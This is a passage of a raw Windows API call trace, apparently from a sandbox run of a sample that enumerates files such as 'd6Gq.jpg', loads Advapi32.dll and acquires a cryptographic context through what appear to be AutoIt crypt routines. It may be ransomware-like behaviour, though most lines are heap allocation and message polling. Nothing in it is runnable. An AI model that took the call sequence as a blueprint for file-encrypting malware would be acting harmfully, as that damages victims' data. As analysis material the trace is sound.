ftLastWriteTime.dwLowDateTime=0x30250f60, ftLastWriteTime.dwHighDateTime=0x1d5e83a, nFileSizeHigh=0x0, nFileSizeLow=0x15327, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="d6Gq.jpg", cAlternateFileName="")) returned 0xa87590 [0248.250] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0248.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0248.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.251] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0248.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0248.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0248.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0248.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0248.252] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0248.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0248.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.253] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0248.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0248.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0248.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0248.254] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0248.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0248.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.256] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0248.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0248.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0248.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0248.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0248.257] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0248.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0248.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0248.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0248.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0248.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0248.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0248.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ac8 [0248.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0248.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0248.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0248.258] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0248.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0248.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0248.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0248.259] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0248.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0248.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0248.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0248.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0248.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree 